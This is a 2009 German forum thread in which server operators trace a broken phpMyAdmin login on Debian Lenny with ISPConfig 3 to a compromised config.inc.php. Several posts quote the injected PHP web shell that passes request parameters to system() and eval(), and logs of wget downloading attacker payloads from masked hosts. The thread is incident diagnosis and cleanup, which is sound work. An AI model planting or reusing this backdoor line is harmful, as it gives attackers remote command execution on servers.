Nach Wochenende kein Zugriff mehr auf phpmyadmin... Debian 5 + ISPconfig3

gbit

New Member
Guten Tag,

ich habe ein Problem, was mir die letzten nerven raubt...
Ich habe mir aufn Homeserver Debian 5 installiert mit ISPconfig3 von diesem Tutorial:

Der Perfekte Server - Debian Lenny (Debian 5.0) [ISPConfig 3]

Es lief auch alles absolut super, keine Fehler und letztendlich lief auch alles! :)
Der Server lief jetzt auch seit 3 Wochen ohne Probleme und am Freitag habe ich sogar noch mit phpmyadmin gearbeitet, doch seit Heute Morgen geht garnix mehr, sobald ich phpmyadmin aufrufe, spuckt mir apache nur folgendes aus:

Willkommen bei phpMyAdmin 2.11.8.1deb5

phpMyAdmin hat versucht eine Verbindung zum MySQL-Server aufzubauen, jedoch hat dieser die Verbindung zurückgewiesen. Sie sollten Ihre Einstellungen für Host, Benutzername und Passwort in Ihrer config.inc.php überprüfen und sich vergewissern, dass diese den Informationen, welche Sie vom Administrator erhalten haben, entsprechen.
Fehler

MySQL meldet: Dokumentation
#1045 - Access denied for user 'root'@'localhost' (using password: NO)
Ungültiger Host-Name für Server 1. Bitte überprüfen Sie Ihre Konfiguration.

Ich habe nichts dran gemacht, ich habe auch schon alle möglichen configs von ISPconfig3 oder phpmyadmin durchforstet, jedoch steht überall immer nur localhost bei hostname ( was ja eigentlich stimmen müsste?! )
Ein Update von mysql o. phpmyadmin hat mir ISPconfig auch nicht angezeigt...

Was mache ich bloß falsch, das es zum verrecken nicht mehr klappen will?
Ach ja, der login über shell ins mysql per root account klappt wunderbar... Und Fremdeinwirkung kann ich auch sofort ausschließen...
 
Gut zu wissen, scheint so das ich mich doch nicht blöd anstelle. Ich habe das selbe Problemm. Jedoch habe ich noch keine Zeit gefunden um zu schauen an was das liegt. Das Problemm ist bei mir seit Donnerstag oder Freitag (glaub ich)

.:EDIT:.
So, habe gerade mal geschaut, also bei mir lag der fehler in der "config.inc.php" von phpmyadmin.
Anscheinend wurde die am 11.06 bei mir verändert, kommt also mit dem Tag wie oben schon erwähnt hin.
der wert für [auth_type] wurde auf 'config' geändert. Habe Ihn wieder auf 'cookie' geändert.
In der Zeile für [host], war dieser aus kommentiert und es stand ein "phpinfo();" da....

Aber Warum?.... Keine Ahnung!
 
Zuletzt bearbeitet:

gbit

New Member
Danke für die Antworten!

@sebastianh, ich habe nochmal meine config.inc.php von phpmyadmin durchforstet, lustigerweise wurde bei mir [auth_type] nicht verändert! Allerdings wurde bei mir komplett die Zeile [host] rausgelöscht... Nachdem ich Sie dann wieder eingetragen hatte, hat wieder alles gefunzt *puh*

Ob das mit dem PoC zusammenhängt müsste ich mal gucken, allerdings ist mir keinerlei direkt Ausgabe von Systemdaten über die config aufgefallen :)

grüße, gbit!
 

rutziste

New Member
hatte das selbe problem. habe die datei config.inc.php im verzeichnis /var/lib/phpmyadmin gelöscht und es funktioniert wieder. würde mich aber sehr interessieren wie das zu stande gekommen ist.

die datei wurde am 16 juni 2009 erstellt um 00:52

achso noch die info ich verwende die letzte ispconfig auf debian lenny.

mfg
 

Till

Administrator
ispconfig schreibt oder ändert die datei nicht, es muss also durch einen anderen prozess geändert worden sein.
 

e1l52

New Member
Gleiches Problem bei mir. /var/lib/phpmyadmin/config.inc.php wurde am 20.6. verändert. Der wert für [auth_type] stand auf 'config' . Habe Ihn wieder auf 'cookie' geändert. Seitdem läufts wieder.

Keine Ahnung wodurch die Änderung erfolgt ist.
 

jogy

New Member
Also wer jetzt etwa pingelig ist (so wie ich), der sieht immer noch im /phpmyadmin eine Fehlermeldung unter dem Login-Feld:

Code:
Ungültiger Host-Name für Server 1. Bitte überprüfen Sie Ihre Konfiguration.

Ich habe in der /var/lib/phpmyadmin/config.inc.php folgende Änderung gemacht:

Zeile 14 aukommentiert:
Code:
/* $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost'; */

Und dafür eingefügt:
Code:
$cfg['Servers'][$i]['host']='localhost';
 

rutziste

New Member
So wens wer gans genau wissen will. habe gestern mal schnell in einer vm ein neues ispcofig installiert. und da steht in der config.inc.php überhaupt nichts drinnen. also eine leere datei.

also ruhig alles löschen was da drinnen steht und es funktioniert wieder.
dann noch die berechtigung 660 auf 640 drehen.

mfg:D
 

jogy

New Member
Stimmt: Habe die config.inc.php mal umbenannt. Jetzt läufts auch ohne Probleme. Tja, weniger ist manchmal eben mehr.
 

jogy

New Member
Wurmkur fällig!

Die Sicherheitslücke wurde beseitigt. Abhilfe schafft ein apt-get update && apt-get upgrade. (Da denkt man, man sei sicher...) :mad:
 

jogy

New Member
Mich würde mal interessieren, wie es dem Exploit möglich war, in den Rootbereich des Servers zu gelangen. :eek:
 

h4nnib4l123

New Member
Habe folgenden Code in der config.inc.php vorgefunden
Code:
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo  '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo  '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';

Naja da wird wohl wieder eine neu-installation anstehen :(
 

jogy

New Member
Schau doch erst einmal in Deine /var/log/apache2/error.log
Hast Du da solche oder ähnliche Einträge?

---------------------snip
--2009-06-23 18:57:49-- http://xxx.xxx.xxx.xxx/psy.tgz
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 592964 (579K) [application/x-gzip]
Saving to: `psy.tgz'

0K .......... .......... .......... .......... .......... 8% 130K 4s
50K .......... .......... .......... .......... .......... 17% 114K 4s
100K .......... .......... .......... .......... .......... 25% 123K 4s
150K .......... .......... .......... .......... .......... 34% 117K 3s
200K .......... .......... .......... .......... .......... 43% 125K 3s
250K .......... .......... .......... .......... .......... 51% 118K 2s
300K .......... .......... .......... .......... .......... 60% 123K 2s
350K .......... .......... .......... .......... .......... 69% 118K 1s
400K .......... .......... .......... .......... .......... 77% 116K 1s
450K .......... .......... .......... .......... .......... 86% 125K 1s
500K .......... .......... .......... .......... .......... 94% 122K 0s
550K .......... .......... ......... 100% 110K=4.8s

2009-06-23 18:57:54 (120 KB/s) - `psy.tgz' saved [592964/592964]

--2009-06-23 19:00:56-- http://xxx.xxx.xxx.xxx/ba.tgz
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 493611 (482K) [application/x-gzip]
Saving to: `ba.tgz'

0K .......... .......... .......... .......... .......... 10% 130K 3s
50K .......... .......... .......... .......... .......... 20% 117K 3s
100K .......... .......... .......... .......... .......... 31% 118K 3s
150K .......... .......... .......... .......... .......... 41% 118K 2s
200K .......... .......... .......... .......... .......... 51% 125K 2s
250K .......... .......... .......... .......... .......... 62% 122K 1s
300K .......... .......... .......... .......... .......... 72% 115K 1s
350K .......... .......... .......... .......... .......... 82% 116K 1s
400K .......... .......... .......... .......... .......... 93% 114K 0s
450K .......... .......... .......... .. 100% 141K=4.0s

2009-06-23 19:01:00 (121 KB/s) - `ba.tgz' saved [493611/493611]

--2009-06-23 19:01:00-- http://xxx.xxx.xxx.xxx/time.set
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5542 (5.4K) [text/plain]
Saving to: `time.set'

0K ..... 100% 140K=0.04s

2009-06-23 19:01:00 (140 KB/s) - `time.set' saved [5542/5542]

./run: line 4: ./httpd: No such file or directory
------------------------- snip
 

h4nnib4l123

New Member
Folgendes konnte ich einmalig ausfindig machen:

--2009-06-20 19:00:04-- http://188.24.51.XXX/50.txt
Connecting to 188.24.51.XXX:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17838 (17K) [text/plain]
Saving to: `/tmp/50.txt'

0K .......... ....... 100% 131K=0.1s

2009-06-20 19:00:04 (131 KB/s) - `/tmp/50.txt' saved [17838/17838]

kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
Die 50.txt ist leider nichtmehr über den obigen Server erreich-/einsehbar.
ein "find /* -name 50.txt" auf meinem Server brachte auch keinen Erfolg.
 

Werbung

Top